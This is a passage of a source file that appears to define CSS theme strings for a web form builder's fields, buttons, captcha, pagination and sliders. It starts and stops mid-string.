!important;\nheight:18px !important;\n}\n.wdform_date:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.time_box\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.time_box:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.am_pm_select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#CFC1C1 !important;\nbackground-color:#ffffff !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#000 !important;\nheight:18px !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.captcha_input:focus\n{\ncolor:#000000 !important;\nheight:18px !important;\nbackground-color:#FFDDC4 !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}   \n.page_deactive\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_active\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#ffffff !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.page_percentage_active \n{\npadding: 0px !important;\nmargin: 0px !important;\nborder-spacing: 0px !important;\nheight: 10px !important;\nline-height: 10px !important;\nbackground-color: #56AEEE !important;\nborder-radius: 0px !important;\nfont-size: 15px !important;\nfloat: left !important;\ntext-align: right !important;\n}\n.page_percentage_deactive {\nheight: 10px !important;\nline-height: 9px !important;\nborder: 1px solid #000 !important;\nbackground-color:#F4801D !important;\ntext-align: left !important;\npadding: 2px !important;\nborder-radius: 0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-color:#F4801D !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-color:#F4801D !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-color:#F4801D !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.other_input\n{\ncolor:#ffffff !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nmargin-left: 25px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.other_input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-color:#F4801D !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#fff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom: 5px !important;\nbackground-color:#56AEEE !important;\nline-height: 35px !important;\n}\n.wdform_percentage_text\n{\nmargin:0px -30px 0px 0px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\nfont-size: 13px !important;\n}\n.wdform_percentage_title\n{\ncolor:#fff !important;\nfont-style:italic !important;\nline-height:9px !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #ffffff !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #000000;\r\npadding:0 4px;\r\n}\r\n\r\n.wdform_grading input:focus\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFDDC4;\r\nborder:1px solid #AA5D00;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder:1px solid #000000;\r\nborder-radius:0px;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder:1px solid #000000;\r\nborder-radius:0px;\r\n}\r\n\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #000000;\r\nborder-radius:0px;\r\nbackground:none;\r\n}\r\n\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#702400;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #000000;\r\nmargin-right:3px;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #000000;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nmargin:5px 7px;\r\nborder:1px solid #000000;\r\npadding:1px;\r\n}\r\n\r\n.wdform_matrix table input:focus, .wdform_matrix table select:focus\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFDDC4;\r\nborder:1px solid #AA5D00;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "18" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th, .wdform_table2 td{\n	vertical-align:top !important;\n	text-align:left;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2,  .wdform_table2 table{\nwidth:inherit !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#702400 !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_date_fields select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date_fields input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_select select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_select select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input \n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_input input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_address select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_address select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.time_box\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.time_box:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.am_pm_select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#CFC1C1 !important;\nbackground-color:#ffffff !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.input_active\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#000 !important;\nheight:18px !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.captcha_input:focus\n{\ncolor:#000000 !important;\nheight:18px !important;\nbackground-color:#FFDDC4 !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}   \n.page_deactive\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.page_active\n{\nborder:0px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\nbackground-color:#fff !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.page_percentage_active \n{\npadding: 0px !important;\nmargin: 0px !important;\nborder-spacing: 0px !important;\nheight: 10px !important;\nline-height: 10px !important;\nbackground-color: #702400 !important;\nborder-radius: 0px !important;\nfont-size: 15px !important;\nfloat: left !important;\ntext-align: right !important;\n}\n.page_percentage_deactive {\nheight: 10px !important;\nline-height: 9px !important;\nborder: 1px solid #000 !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\nbackground-color: #fff !important;\ntext-align: left !important;\npadding: 2px !important;\nborder-radius: 0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.button_reset\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.wdform_button button \n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\n.other_input\n{\ncolor:#ffffff !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nmargin-left: 25px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.other_input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 13px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_2.png) !important;\nborder: 0px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#fff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom: 5px !important;\nbackground-color:#702400 !important;\nline-height: 35px !important;\n}\n.wdform_percentage_text\n{\n	font-family:''Times New Roman'', Times, serif !important;\nmargin:0px -30px 0px 0px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\nfont-size: 13px !important;\n}\n.wdform_percentage_title\n{\n	font-family:''Times New Roman'', Times, serif !important;\ncolor:#fff !important;\nfont-style:italic !important;\nline-height:9px !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #ffffff !important;\nborder-radius:1px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #000000;\r\npadding:0 4px;\r\n}\r\n\r\n\r\n.wdform_grading input:focus\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFDDC4;\r\nborder:1px solid #9DA277;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder:1px solid #000000;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\nborder:1px solid #000000;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #000000;\r\nborder-radius:0px;\r\nbackground:none;\r\n}\r\n\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#56AEEE;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #000000;\r\nmargin-right:3px;\r\nborder-radius:0px;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #000000;\r\nmargin-right:3px !important;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nmargin:5px 7px;\r\nborder:1px solid #000000;\r\npadding:1px;\r\n}\r\n\r\n.wdform_matrix table input:focus, .wdform_matrix table select:focus\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFDDC4;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "19" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th, .wdform_table2 td{\n	vertical-align:top !important;\n	text-align:left;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2,  .wdform_table2 table{\nwidth:inherit !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:left;\n	margin:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth: 100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#F06E00 !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_date_fields select:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields select\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nborder:1px solid #000 !important;\nborder-radius:0px !important;\nheight:20px !important;\n}\n.wdform_date_fields input\n{\ncolor:#000 !important;\nbackground-color:#ffffff !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_date_fields input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.wdform_select 